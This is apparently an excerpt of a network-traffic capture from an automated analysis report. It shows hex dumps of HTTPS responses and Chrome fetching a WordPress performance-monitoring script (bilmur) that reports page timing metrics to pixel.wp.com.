                                                                                                                                                                                                                                                2024-12-20 15:45:35 UTC1369INData Raw: c5 86 c6 d9 4b 5a 8e ff 7f 4b 85 65 52 0d 78 88 9f 75 62 df 77 6e 1b a1 ab f8 60 3e da 0c cf 06 84 d0 c1 6a 6d 55 e8 e5 59 f5 73 96 b4 56 36 c7 e2 c1 30 50 09 08 01 00 e0 0c 14 39 25 c1 75 e8 88 a4 d3 26 a5 bf f8 55 ad 60 71 55 ef d2 33 28 7e ff bf 42 f0 df bf 69 12 20 00 84 76 e6 30 b1 6d 1a a3 94 82 9b 3d f5 41 d5 d1 a3 53 0f 19 b8 1f 3a 86 e6 af f5 bd fc 4d ed 37 bf b5 b5 f8 a3 e0 30 90 09 01 41 88 90 3a b7 9b 83 3f c8 7d 41 6b 45 49 fb eb df c8 85 d9 ae cb a7 f7 f9 d3 49 7d d2 13 d5 83 fa 40 2f 2d 0d be f2 61 19 50 06 d2 76 22 56 e7 f1 a3 94 aa 8a c7 a5 a5 b8 69 ff 5c e3 b0 11 e9 47 8c 48 3a 62 64 ea de 58 a5 92 da 90 08 c5 8c 54 99 00 44 5d 50 de 1c 0f 46 18 06 2c 84 01 0b 21 74 d0 7b 6b 6e fd 8d 2f ad f7 b5 84 41 15 8a 04 ba 7b cb ab 99 24 04 0f 84
                                                                                                                                                                                                                                                Data Ascii: KZKeRxubwn`>jmUYsV60P9%u&U`qU3(~Bi v0m=AS:M70A:?}AkEII}@/-aPv"Vi\GH:bdXTD]PF,!t{kn/A{$
                                                                                                                                                                                                                                                2024-12-20 15:45:35 UTC1369INData Raw: fd f6 ee 57 b5 2d ed 61 2b 16 56 a8 a9 1b 44 77 83 a6 0b 85 c6 43 c1 f0 6f ab db ae 7b 6c c5 b8 6b 17 7c 3c af 49 80 f8 c3 71 79 ef de 3e 42 d3 8c 58 98 c5 63 84 c8 5a b2 cb 90 5d fa 8a b2 e0 5e dd de 37 bf ad fd ee 97 26 c5 4b 09 01 33 26 8e 9b 92 f5 ef db 47 f6 3e 5d 01 c0 94 e1 29 ff ba 75 54 6a aa d7 b4 c1 d0 48 c8 1f bb e3 f5 32 2e f8 c1 dc 2c b0 13 8d 86 17 1e 9d 33 f7 91 f1 7d 0b 92 63 71 c1 05 51 3d d2 fc e5 6d cf ce ac c2 3f 25 84 01 0b 21 84 36 da 50 17 fa ea b7 56 90 d9 4e 8d 22 62 5c 30 93 de 74 5e bf 5b ce e9 0b 00 6f cf a9 3b ed ee a5 df 2d 68 90 15 c7 70 73 43 97 34 55 92 25 4a 28 21 84 50 4a 64 89 1a 9a 64 b8 88 e6 11 65 35 ed e7 3d b4 e2 a6 17 d7 99 36 bb e0 a8 9c 3b 2f 28 2a 2c 48 bb fa 8c be af df 3c 72 e6 c3 13 7e f9 c7 21 d3 c6 a5 ef
                                                                                                                                                                                                                                                Data Ascii: W-a+VDwCo{lk|<Iqy>BXcZ]^7&K3&G>])uTjH2.,3}cqQ=m?%!6PVN"b\0t^[o;-hpsC4U%J(!PJdde5=6;/(*,H<r~!
                                                                                                                                                                                                                                                2024-12-20 15:45:35 UTC1369INData Raw: 25 e0 d6 73 33 2b bf 9c df 10 08 85 34 17 31 12 15 c3 2b 19 6e 62 24 2a ba 57 62 76 ec e7 65 4d d7 3e b7 fa f4 fb 96 95 d6 85 77 7f 7b d7 56 05 eb 5b 82 b2 4c 1c 47 a4 26 2a 27 4d ca d8 cd 37 cc 4c d6 47 16 1a 60 13 42 08 d8 f6 d2 f2 30 e7 5b ed cc 24 8f 04 89 b2 9a 20 83 57 ca 4a 51 9b 3b e2 17 3c b4 f2 93 d9 95 60 c5 41 92 80 aa 82 1a 8e a3 98 61 ce 18 77 bb 88 e6 82 95 ab db ce 7e 70 55 b3 2f be 83 cf fd 69 55 db e9 0f ac 7c ef db 6a db 8a 2a 1e 0a 71 c6 4d ca c1 e0 a0 31 47 e6 51 26 1b 5c d3 d8 f2 35 ad a7 df bf 72 ee b2 b6 bd 77 0a 9d 73 78 0e 10 ce 04 55 24 62 05 62 c5 b5 d1 ad 0e b1 44 52 92 14 29 41 82 04 39 d9 23 25 7a e4 4f 7e 69 fc eb 0b c5 7e 5f 10 54 0a 31 cb 09 5b 10 b5 55 19 3a fb 34 25 4a bc 09 4a e7 1e f3 26 48 fa ef 4f 35 1e 37 2e 7d dc
                                                                                                                                                                                                                                                Data Ascii: %s3+41+nb$*WbveM>w{V[LG&*'M7LG`B0[$ WJQ;<`Aaw~pU/iU|j*qM1GQ&\5rwsxU$bbDR)A9#%zO~i~_T1[U:4%JJ&HO57.}
                                                                                                                                                                                                                                                2024-12-20 15:45:35 UTC1369INData Raw: 7e f4 ca c1 77 5d 50 b4 65 ba ea 94 99 ac bd 78 fd 90 d3 a6 64 5b 31 a2 ab c0 c2 f1 c7 df 2f c3 ab 07 06 2c 84 10 ea 46 7b d0 3c ef e1 55 e7 3c b4 e2 dd af cb ca 6a 02 0e 73 28 88 1d 36 23 09 c6 79 2c e0 98 21 51 90 9b 7c ee f1 79 6f fc 6d 04 a1 52 73 47 7c 59 a9 1f 64 d8 db 73 da 6c d1 d6 45 41 85 4f e6 b7 2c 29 0d ec da 3b 70 2e 02 c1 38 80 00 01 44 91 d2 93 f6 4c d9 f1 24 8f 6c 68 54 00 10 22 2c 8b c5 ed ed e4 3f 22 c0 81 2b 8e cf ff e3 89 05 db 7b ab 23 47 a6 9e 79 68 16 b3 05 21 14 38 5f 5c dc 1e 8e b3 2d 17 28 ad 8f be ff 53 13 48 9c 33 a1 6a ca 63 57 0e 3a 64 d0 76 3b fe 0e 1f 91 72 c9 f4 5c 61 12 45 26 4e c4 fa e4 d7 bd 55 a6 2b d1 45 41 00 01 02 02 a2 26 eb 32 0a 6d 63 8a 92 88 3f 18 8f 84 e0 86 d3 f3 4f 9b 92 b9 6b a7 c0 59 87 a6 83 45 39 27 e0
                                                                                                                                                                                                                                                Data Ascii: ~w]Pexd[1/,F{<U<js(6#y,!Q|yomRsG|YdslEAO,);p.8DL$lhT",?"+{#Gyh!8_\-(SH3jcW:dv;r\aE&NU+EA&2mc?OkYE9'
                                                                                                                                                                                                                                                2024-12-20 15:45:35 UTC1369INData Raw: 07 86 2c 04 00 a5 ad 7e cb b4 85 a1 e1 45 05 03 16 42 08 01 bc 31 bb 0e 4c 53 75 f7 e2 6b b7 10 a6 05 93 c6 64 be 76 f3 70 43 95 be 5d da 72 ee 43 ab 82 ad 61 cd 0b 94 d0 7d 39 e2 aa 5b 84 00 08 5e de 18 ed 93 e1 96 77 b2 83 52 96 48 56 aa 6b 5d 4d 98 00 80 a0 d5 ad 8e c3 b9 4c 77 77 44 47 55 93 29 98 44 64 c6 1d c8 48 32 92 bd db 0c ed 22 20 00 80 80 a6 f4 bc ff 09 90 cd ed 82 5b 6f 5f 65 73 0c 24 15 80 1b 1a 2d ab 0b dc f4 64 47 cf 05 cc 08 10 8f e4 72 51 ce 39 50 12 89 39 7b e3 a0 ac aa 08 80 42 01 38 d8 ce 90 7c 4f b7 ad 3b cc 11 e9 c9 7a 82 6b 77 1b 7e 92 3c ca 19 53 d3 e7 af 69 23 e0 58 16 ff 78 5e e3 19 87 66 75 a9 b1 3e 7b 59 47 7b 47 4c 51 05 a7 ca c5 c7 e4 6e d9 91 ed 8b 38 6d 41 0b 88 90 24 c9 32 e3 ff fc a8 02 4c de c3 49 2d 04 e8 92 cb 2d 01
                                                                                                                                                                                                                                                Data Ascii: ,~EB1LSukdvpC]rCa}9[^wRHVk]MLwwDGU)DdH2" [o_es$-dGrQ9P9{B8|O;zkw~<Si#Xx^fu>{YG{GLQn8mA$2LI--
                                                                                                                                                                                                                                                2024-12-20 15:45:35 UTC1369INData Raw: 6e 7b 7d 43 43 c7 2e 96 df 7c e0 9d f2 da fa 90 a1 41 34 2e f4 54 f7 d5 27 e5 ed d5 2d 2d ca f6 a4 64 79 2d 87 68 2a ad 6b 08 ae a9 de 9f 01 2b 6e b1 2b 9f 29 59 5f 19 30 34 88 9b 22 39 d5 73 cf 45 fd f7 e5 0a 5c 71 7c 01 28 84 31 02 92 fd e1 ef 25 dd 5f fd a6 1a 28 38 0c dc 29 ca a5 c7 e5 6f fb 2a 59 22 a3 fa 25 83 a0 00 54 38 6c e1 fa 10 e3 1c 2f 11 18 b0 10 42 68 57 a8 b2 7c c2 98 44 70 68 cf bd 61 42 6c 4a 54 12 3d 58 ae 63 44 51 a1 a4 ac bd a2 a1 57 39 29 27 d5 b8 ef d2 7e 10 06 87 11 97 06 b5 35 fe 8b 1f 5d dd d4 b1 d3 e5 b9 1f 7d bf fc 95 2f ab 14 85 33 46 c0 a6 b7 9c 53 50 98 e5 de ab db e9 d2 a4 a3 47 a7 0a 93 53 22 84 10 6f cc a9 b7 f7 ce d4 37 3d aa 6d 8d 1e 79 eb 92 9f 17 34 e8 06 77 98 10 44 bb f7 92 7e 93 06 27 ef cb 75 98 38 24 69 ea a8 34
                                                                                                                                                                                                                                                Data Ascii: n{}CC.|A4.T'--dy-h*k+n+)Y_04"9sE\q|(1%_(8)o*Y"%T8l/BhW|DphaBlJT=XcDQW9)'~5]}/3FSPGS"o7=my4wD~'u8$i4
                                                                                                                                                                                                                                                2024-12-20 15:45:35 UTC1369INData Raw: 60 21 84 d0 be 97 91 a4 fd eb d6 11 77 67 1a cf 7d 5a 15 0b db a0 0a 55 02 42 bb 94 62 94 3f 9a d7 7c d7 8c 22 8f 4b bd 62 7a ce e7 b3 ea 6c 0e f2 81 3d ea c1 b1 c4 b0 fe a9 7d d2 77 ba 93 6e 74 bf 84 af 1f 1a fb f0 fb 95 6f cd ae 89 85 6d aa 82 a6 73 00 d2 d8 16 6a 68 0a 00 ef 6c ba 13 40 29 48 44 55 80 c8 60 33 12 0b 03 35 b4 cb 4f c9 b9 6d 46 d1 a0 3c 4f 0f e9 0f 7e 2f 61 de bb 3a e6 a2 b3 dc ab 00 01 a2 73 ca e7 6d dd 31 a3 af 2f 6c 3f f1 de 86 a8 ed a8 3a 50 37 dd 50 eb db 50 d1 0e aa 2a cb 12 80 70 6c 06 8e 03 12 a1 54 70 10 40 b5 c2 4c 43 d9 f6 28 76 36 d0 09 10 02 14 89 48 5b 4f 14 48 80 08 e0 82 03 17 36 e3 00 82 5a 11 02 ba 7c d8 98 b4 f3 8e c8 3c ff a8 ec 94 5e 4c 52 24 00 f8 c6 cd 17 bd aa 58 2b 36 fe 6f e7 e6 f7 d8 43 3d 75 68 d2 c0 be 89 c5
                                                                                                                                                                                                                                                Data Ascii: `!wg}ZUBb?|"Kbzl=}wntomsjhl@)HDU`35OmF<O~/a:sm1/l?:P7PP*plTp@LC(v6H[OH6Z|<^LR$X+6oC=uh
                                                                                                                                                                                                                                                2024-12-20 15:45:35 UTC1369INData Raw: 99 d7 04 c2 be b0 31 bc ea 85 84 ac 64 1d cf 25 84 01 0b 21 84 d0 46 b3 16 b7 bd 3a ab 0e 14 96 9c e2 7e ec ca c1 87 8f 4c 93 08 54 34 c7 0a 32 dd fb 6b 95 fc 21 eb e3 39 cd 20 62 20 11 10 64 73 2f 9c 00 90 05 70 6e b8 f5 13 27 65 df 7a 76 fe 84 41 49 fb 6b 25 db 82 16 28 00 94 c6 2c 11 8d 33 3c 91 d0 be 87 83 dc 11 42 e8 c0 f5 ca 37 d5 2c 66 41 9c df 75 c1 c0 2b 4f 28 18 98 eb ee 97 e3 9e 36 26 2d 33 59 db 5f ab a4 c8 94 e8 82 aa 5c 56 19 48 00 b2 00 22 40 02 10 0c 82 71 b0 45 2c 16 fd 78 4e d5 59 f7 2d 5f b4 de bf bf 56 f2 ee 0b 8a 92 b3 bc e0 4e ba f3 dc dc a2 6c 37 9e 48 68 df c3 4a ee 08 21 74 80 e2 5c e4 ce 98 d3 d4 18 d6 12 dd 15 6f 1f 96 93 e2 3a 10 d6 aa a4 3a 30 fc ea df 78 34 32 a4 7f ca e7 0f 8c f5 b8 64 ee 08 a0 e0 38 62 5d 6d ec 9d 1f 1b fe
                                                                                                                                                                                                                                                Data Ascii: 1d%!F:~LT42k!9 b ds/pn'ezvAIk%(,3<B7,fAu+O(6&-3Y_\VH"@qE,xNY-_VNl7HhJ!t\o::0x42d8b]m
                                                                                                                                                                                                                                                2024-12-20 15:45:35 UTC1369INData Raw: 48 a2 fd 06 25 79 0d 69 6d 75 c0 0e 31 50 ec f9 cb 9a ae 7c c2 fe fc c1 f1 05 99 46 d7 26 8a d6 d8 f9 8f ac fe 75 49 23 08 0e 0c 52 72 dc 85 99 9e 66 7f b4 be 26 6c 06 a3 5f ff 1c 5b 55 15 fd ea 81 d1 23 8b 36 27 da 8a 86 e8 45 8f ae 5d 51 dc 0c 8c 83 ae 0c c8 f7 b8 75 a5 ba 39 ec 6b 8c 40 53 bc 2d 60 6e 5a 72 65 79 f0 92 47 d7 ae 2b 6b 01 41 40 a7 03 0b 12 0d 4d aa 68 0c 84 5a 2c 68 8a 75 3b e2 0d ed 43 9b ff 26 da 22 76 59 5b ac b2 3d 56 e7 b7 aa 7d f1 95 8d e1 f5 4d 51 7f cc b1 1d 01 8c 03 25 20 4b 18 b0 10 42 e8 c0 32 b2 6f c2 0f cf 1c 22 51 08 45 ac 4b 1e 5f d5 de 12 c9 cd 4b 78 e9 81 61 29 5e 35 6e 71 87 93 d1 fd 36 16 76 7a f2 e3 f2 db 9e 5c 0d 6e 0e 20 cd 38 a9 e0 d6 f3 fa 8e 2a f2 52 42 01 44 38 e6 7c b1 b0 e5 d6 57 cb ea 1a 7d 15 95 ed 47 df b2
                                                                                                                                                                                                                                                Data Ascii: H%yimu1P|F&uI#Rrf&l_[U#6'E]Qu9k@S-`nZreyG+kA@MhZ,hu;C&"vY[=V}MQ% KB2o"QEK_Kxa)^5nq6vz\n 8*RBD8|W}G


                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                17192.168.2.1149766192.0.78.134436716C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                2024-12-20 15:45:36 UTC405OUTGET /wp-content/js/bilmur-4.min.js?i=12&m=202451 HTTP/1.1
                                                                                                                                                                                                                                                Host: dnearymedahealthstaffing.wordpress.com
                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                Sec-Fetch-Site: none
                                                                                                                                                                                                                                                Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                2024-12-20 15:45:36 UTC436INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                Server: nginx
                                                                                                                                                                                                                                                Date: Fri, 20 Dec 2024 15:45:36 GMT
                                                                                                                                                                                                                                                Content-Type: application/javascript
                                                                                                                                                                                                                                                Content-Length: 11997
                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                Last-Modified: Fri, 01 Nov 2024 21:29:28 GMT
                                                                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                                                                ETag: "67254838-2edd"
                                                                                                                                                                                                                                                Expires: Sat, 20 Dec 2025 15:45:36 GMT
                                                                                                                                                                                                                                                Cache-Control: max-age=31536000
                                                                                                                                                                                                                                                X-ac: 1.jfk _dca MISS
                                                                                                                                                                                                                                                Alt-Svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                                                                2024-12-20 15:45:36 UTC933INData Raw: 21 66 75 6e 63 74 69 6f 6e 28 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 76 61 72 20 6e 3d 66 75 6e 63 74 69 6f 6e 28 6e 2c 74 2c 65 2c 69 29 7b 76 61 72 20 72 2c 6f 3b 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 28 75 29 7b 74 2e 76 61 6c 75 65 3e 3d 30 26 26 28 75 7c 7c 69 29 26 26 28 28 6f 3d 74 2e 76 61 6c 75 65 2d 28 6e 75 6c 6c 21 3d 72 3f 72 3a 30 29 29 7c 7c 76 6f 69 64 20 30 3d 3d 3d 72 29 26 26 28 72 3d 74 2e 76 61 6c 75 65 2c 74 2e 64 65 6c 74 61 3d 6f 2c 74 2e 72 61 74 69 6e 67 3d 66 75 6e 63 74 69 6f 6e 28 6e 2c 74 29 7b 72 65 74 75 72 6e 20 6e 3e 74 5b 31 5d 3f 22 70 6f 6f 72 22 3a 6e 3e 74 5b 30 5d 3f 22 6e 65 65 64 73 2d 69 6d 70 72 6f 76 65 6d 65 6e 74 22 3a 22 67 6f 6f 64 22 7d 28 74 2e 76 61 6c 75 65 2c 65 29 2c 6e 28 74 29 29 7d 7d
                                                                                                                                                                                                                                                Data Ascii: !function(){"use strict";var n=function(n,t,e,i){var r,o;return function(u){t.value>=0&&(u||i)&&((o=t.value-(null!=r?r:0))||void 0===r)&&(r=t.value,t.delta=o,t.rating=function(n,t){return n>t[1]?"poor":n>t[0]?"needs-improvement":"good"}(t.value,e),n(t))}}
                                                                                                                                                                                                                                                2024-12-20 15:45:36 UTC1369INData Raw: 67 61 74 69 6f 6e 54 79 70 65 3a 75 7d 7d 2c 75 3d 66 75 6e 63 74 69 6f 6e 28 6e 29 7b 64 6f 63 75 6d 65 6e 74 2e 70 72 65 72 65 6e 64 65 72 69 6e 67 3f 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 22 70 72 65 72 65 6e 64 65 72 69 6e 67 63 68 61 6e 67 65 22 2c 28 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 6e 28 29 7d 29 2c 21 30 29 3a 6e 28 29 7d 2c 63 3d 5b 38 30 30 2c 31 38 30 30 5d 2c 61 3d 66 75 6e 63 74 69 6f 6e 28 6e 29 7b 64 6f 63 75 6d 65 6e 74 2e 70 72 65 72 65 6e 64 65 72 69 6e 67 3f 75 28 28 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 61 28 6e 29 7d 29 29 3a 22 63 6f 6d 70 6c 65 74 65 22 21 3d 3d 64 6f 63 75 6d 65 6e 74 2e 72 65 61 64 79 53 74 61 74 65 3f 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 22 6c 6f 61
                                                                                                                                                                                                                                                Data Ascii: gationType:u}},u=function(n){document.prerendering?addEventListener("prerenderingchange",(function(){return n()}),!0):n()},c=[800,1800],a=function(n){document.prerendering?u((function(){return a(n)})):"complete"!==document.readyState?addEventListener("loa
                                                                                                                                                                                                                                                2024-12-20 15:45:36 UTC1369INData Raw: 7b 76 61 72 20 6e 3d 22 22 3b 69 66 28 76 6f 69 64 20 30 3d 3d 3d 62 2e 74 74 66 62 29 72 65 74 75 72 6e 20 6e 3b 66 6f 72 28 76 61 72 20 74 20 69 6e 20 62 29 76 6f 69 64 20 30 21 3d 3d 62 5b 74 5d 26 26 28 6e 2b 3d 22 26 22 2b 74 2b 22 3d 22 2b 65 6e 63 6f 64 65 55 52 49 43 6f 6d 70 6f 6e 65 6e 74 28 62 5b 74 5d 29 29 3b 72 65 74 75 72 6e 20 6e 3f 22 68 74 74 70 73 3a 2f 2f 70 69 78 65 6c 2e 77 70 2e 63 6f 6d 2f 62 6f 6f 6d 2e 67 69 66 3f 62 69 6c 6d 75 72 3d 31 22 2b 6e 3a 6e 75 6c 6c 7d 66 75 6e 63 74 69 6f 6e 20 43 28 29 7b 69 66 28 21 4d 29 7b 4d 3d 21 30 3b 76 61 72 20 6e 3d 45 28 29 3b 69 66 28 6e 29 7b 69 66 28 22 69 6d 61 67 65 22 3d 3d 3d 67 29 28 6e 65 77 20 49 6d 61 67 65 29 2e 73 72 63 3d 6e 3b 22 73 65 6e 64 42 65 61 63 6f 6e 22 3d 3d 3d 67
                                                                                                                                                                                                                                                Data Ascii: {var n="";if(void 0===b.ttfb)return n;for(var t in b)void 0!==b[t]&&(n+="&"+t+"="+encodeURIComponent(b[t]));return n?"https://pixel.wp.com/boom.gif?bilmur=1"+n:null}function C(){if(!M){M=!0;var n=E();if(n){if("image"===g)(new Image).src=n;"sendBeacon"===g
                                                                                                                                                                                                                                                2024-12-20 15:45:36 UTC1369INData Raw: 61 72 20 69 3d 6e 65 77 20 50 65 72 66 6f 72 6d 61 6e 63 65 4f 62 73 65 72 76 65 72 28 28 66 75 6e 63 74 69 6f 6e 28 6e 29 7b 50 72 6f 6d 69 73 65 2e 72 65 73 6f 6c 76 65 28 29 2e 74 68 65 6e 28 28 66 75 6e 63 74 69 6f 6e 28 29 7b 74 28 6e 2e 67 65 74 45 6e 74 72 69 65 73 28 29 29 7d 29 29 7d 29 29 3b 72 65 74 75 72 6e 20 69 2e 6f 62 73 65 72 76 65 28 4f 62 6a 65 63 74 2e 61 73 73 69 67 6e 28 7b 74 79 70 65 3a 6e 2c 62 75 66 66 65 72 65 64 3a 21 30 7d 2c 65 7c 7c 7b 7d 29 29 2c 69 7d 7d 63 61 74 63 68 28 6e 29 7b 7d 7d 2c 6a 3d 5b 31 38 30 30 2c 33 65 33 5d 2c 42 3d 66 75 6e 63 74 69 6f 6e 28 74 2c 69 29 7b 76 6f 69 64 20 30 3d 3d 3d 69 26 26 28 69 3d 7b 7d 29 2c 75 28 28 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 75 2c 63 3d 46 28 29 2c 61 3d 6f 28 22
                                                                                                                                                                                                                                                Data Ascii: ar i=new PerformanceObserver((function(n){Promise.resolve().then((function(){t(n.getEntries())}))}));return i.observe(Object.assign({type:n,buffered:!0},e||{})),i}}catch(n){}},j=[1800,3e3],B=function(t,i){void 0===i&&(i={}),u((function(){var u,c=F(),a=o("
                                                                                                                                                                                                                                                2024-12-20 15:45:36 UTC1369INData Raw: 3d 63 2c 75 2e 65 6e 74 72 69 65 73 3d 61 2c 72 28 29 29 7d 2c 64 3d 4e 28 22 6c 61 79 6f 75 74 2d 73 68 69 66 74 22 2c 66 29 3b 64 26 26 28 72 3d 6e 28 74 2c 75 2c 71 2c 69 2e 72 65 70 6f 72 74 41 6c 6c 43 68 61 6e 67 65 73 29 2c 64 6f 63 75 6d 65 6e 74 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 22 76 69 73 69 62 69 6c 69 74 79 63 68 61 6e 67 65 22 2c 28 66 75 6e 63 74 69 6f 6e 28 29 7b 22 68 69 64 64 65 6e 22 3d 3d 3d 64 6f 63 75 6d 65 6e 74 2e 76 69 73 69 62 69 6c 69 74 79 53 74 61 74 65 26 26 28 66 28 64 2e 74 61 6b 65 52 65 63 6f 72 64 73 28 29 29 2c 72 28 21 30 29 29 7d 29 29 2c 65 28 28 66 75 6e 63 74 69 6f 6e 28 29 7b 63 3d 30 2c 75 3d 6f 28 22 43 4c 53 22 2c 30 29 2c 72 3d 6e 28 74 2c 75 2c 71 2c 69 2e 72 65 70 6f 72 74 41 6c 6c 43 68
                                                                                                                                                                                                                                                Data Ascii: =c,u.entries=a,r())},d=N("layout-shift",f);d&&(r=n(t,u,q,i.reportAllChanges),document.addEventListener("visibilitychange",(function(){"hidden"===document.visibilityState&&(f(d.takeRecords()),r(!0))})),e((function(){c=0,u=o("CLS",0),r=n(t,u,q,i.reportAllCh
                                                                                                                                                                                                                                                2024-12-20 15:45:36 UTC1369INData Raw: 6e 63 79 3f 28 65 2e 65 6e 74 72 69 65 73 3d 5b 6e 5d 2c 65 2e 6c 61 74 65 6e 63 79 3d 6e 2e 64 75 72 61 74 69 6f 6e 29 3a 6e 2e 64 75 72 61 74 69 6f 6e 3d 3d 3d 65 2e 6c 61 74 65 6e 63 79 26 26 6e 2e 73 74 61 72 74 54 69 6d 65 3d 3d 3d 65 2e 65 6e 74 72 69 65 73 5b 30 5d 2e 73 74 61 72 74 54 69 6d 65 26 26 65 2e 65 6e 74 72 69 65 73 2e 70 75 73 68 28 6e 29 3b 65 6c 73 65 7b 76 61 72 20 69 3d 7b 69 64 3a 6e 2e 69 6e 74 65 72 61 63 74 69 6f 6e 49 64 2c 6c 61 74 65 6e 63 79 3a 6e 2e 64 75 72 61 74 69 6f 6e 2c 65 6e 74 72 69 65 73 3a 5b 6e 5d 7d 3b 59 2e 73 65 74 28 69 2e 69 64 2c 69 29 2c 58 2e 70 75 73 68 28 69 29 7d 58 2e 73 6f 72 74 28 28 66 75 6e 63 74 69 6f 6e 28 6e 2c 74 29 7b 72 65 74 75 72 6e 20 74 2e 6c 61 74 65 6e 63 79 2d 6e 2e 6c 61 74 65 6e 63
                                                                                                                                                                                                                                                Data Ascii: ncy?(e.entries=[n],e.latency=n.duration):n.duration===e.latency&&n.startTime===e.entries[0].startTime&&e.entries.push(n);else{var i={id:n.interactionId,latency:n.duration,entries:[n]};Y.set(i.id,i),X.push(i)}X.sort((function(n,t){return t.latency-n.latenc
                                                                                                                                                                                                                                                2024-12-20 15:45:36 UTC1369INData Raw: 6e 28 74 2c 61 2c 75 6e 2c 69 2e 72 65 70 6f 72 74 41 6c 6c 43 68 61 6e 67 65 73 29 2c 4f 28 28 66 75 6e 63 74 69 6f 6e 28 29 7b 61 2e 76 61 6c 75 65 3d 70 65 72 66 6f 72 6d 61 6e 63 65 2e 6e 6f 77 28 29 2d 65 2e 74 69 6d 65 53 74 61 6d 70 2c 63 6e 5b 61 2e 69 64 5d 3d 21 30 2c 75 28 21 30 29 7d 29 29 7d 29 29 7d 7d 29 29 7d 2c 66 6e 3d 21 30 3b 76 61 72 20 64 6e 2c 76 6e 2c 6d 6e 3d 5b 22 75 6e 6c 6f 61 64 45 76 65 6e 74 53 74 61 72 74 22 2c 22 75 6e 6c 6f 61 64 45 76 65 6e 74 45 6e 64 22 2c 22 72 65 64 69 72 65 63 74 53 74 61 72 74 22 2c 22 72 65 64 69 72 65 63 74 45 6e 64 22 2c 22 66 65 74 63 68 53 74 61 72 74 22 2c 22 64 6f 6d 61 69 6e 4c 6f 6f 6b 75 70 53 74 61 72 74 22 2c 22 64 6f 6d 61 69 6e 4c 6f 6f 6b 75 70 45 6e 64 22 2c 22 63 6f 6e 6e 65 63 74
                                                                                                                                                                                                                                                Data Ascii: n(t,a,un,i.reportAllChanges),O((function(){a.value=performance.now()-e.timeStamp,cn[a.id]=!0,u(!0)}))}))}}))},fn=!0;var dn,vn,mn=["unloadEventStart","unloadEventEnd","redirectStart","redirectEnd","fetchStart","domainLookupStart","domainLookupEnd","connect
                                                                                                                                                                                                                                                2024-12-20 15:45:36 UTC1369INData Raw: 74 29 3a 69 2e 66 69 72 73 74 49 6e 74 65 72 69 6d 52 65 73 70 6f 6e 73 65 53 74 61 72 74 2c 62 2e 6e 74 2b 3d 75 28 73 6e 29 29 2c 62 2e 6e 74 2b 3d 68 6e 2c 72 3e 31 26 26 28 62 2e 6e 74 2b 3d 76 6f 69 64 20 30 3d 3d 3d 69 2e 6e 65 78 74 48 6f 70 50 72 6f 74 6f 63 6f 6c 3f 22 22 3a 69 2e 6e 65 78 74 48 6f 70 50 72 6f 74 6f 63 6f 6c 29 2c 62 2e 6e 74 21 3d 3d 6f 26 26 77 28 29 7d 7d 66 75 6e 63 74 69 6f 6e 20 75 28 6e 29 7b 76 61 72 20 65 3d 22 22 3b 72 65 74 75 72 6e 20 6e 2e 66 6f 72 45 61 63 68 28 28 66 75 6e 63 74 69 6f 6e 28 6e 2c 69 29 7b 69 3e 30 26 26 28 65 2b 3d 22 5f 22 29 3b 76 61 72 20 72 3d 74 5b 6e 5d 3b 65 2b 3d 76 6f 69 64 20 30 3d 3d 3d 72 3f 22 22 3a 72 2e 74 6f 53 74 72 69 6e 67 28 33 36 29 7d 29 29 2c 65 7d 7d 66 75 6e 63 74 69 6f 6e
                                                                                                                                                                                                                                                Data Ascii: t):i.firstInterimResponseStart,b.nt+=u(sn)),b.nt+=hn,r>1&&(b.nt+=void 0===i.nextHopProtocol?"":i.nextHopProtocol),b.nt!==o&&w()}}function u(n){var e="";return n.forEach((function(n,i){i>0&&(e+="_");var r=t[n];e+=void 0===r?"":r.toString(36)})),e}}function
                                                                                                                                                                                                                                                2024-12-20 15:45:36 UTC1369INData Raw: 69 6f 6e 28 29 7b 69 66 28 77 69 6e 64 6f 77 2e 50 65 72 66 6f 72 6d 61 6e 63 65 4d 65 61 73 75 72 65 26 26 77 69 6e 64 6f 77 2e 50 65 72 66 6f 72 6d 61 6e 63 65 4d 61 72 6b 29 7b 4d 6e 3d 73 28 22 63 75 73 74 6f 6d 4d 65 61 73 75 72 65 73 50 72 65 66 69 78 65 73 22 29 2c 79 6e 3d 73 28 22 63 75 73 74 6f 6d 4d 61 72 6b 73 50 72 65 66 69 78 65 73 22 29 2c 4d 6e 2e 70 75 73 68 28 22 62 69 6c 6d 75 72 5f 22 29 2c 79 6e 2e 70 75 73 68 28 22 62 69 6c 6d 75 72 5f 22 29 3b 76 61 72 20 6e 3d 43 6e 3b 74 72 79 7b 67 6e 3d 70 6e 28 22 6d 61 72 6b 22 2c 6e 29 2c 62 6e 3d 70 6e 28 22 6d 65 61 73 75 72 65 22 2c 6e 29 7d 63 61 74 63 68 28 6e 29 7b 53 6e 28 29 7d 7d 7d 28 29 7d 66 75 6e 63 74 69 6f 6e 20 4f 6e 28 29 7b 53 3d 21 31 2c 44 3d 21 31 2c 78 3d 21 31 2c 6f 6e
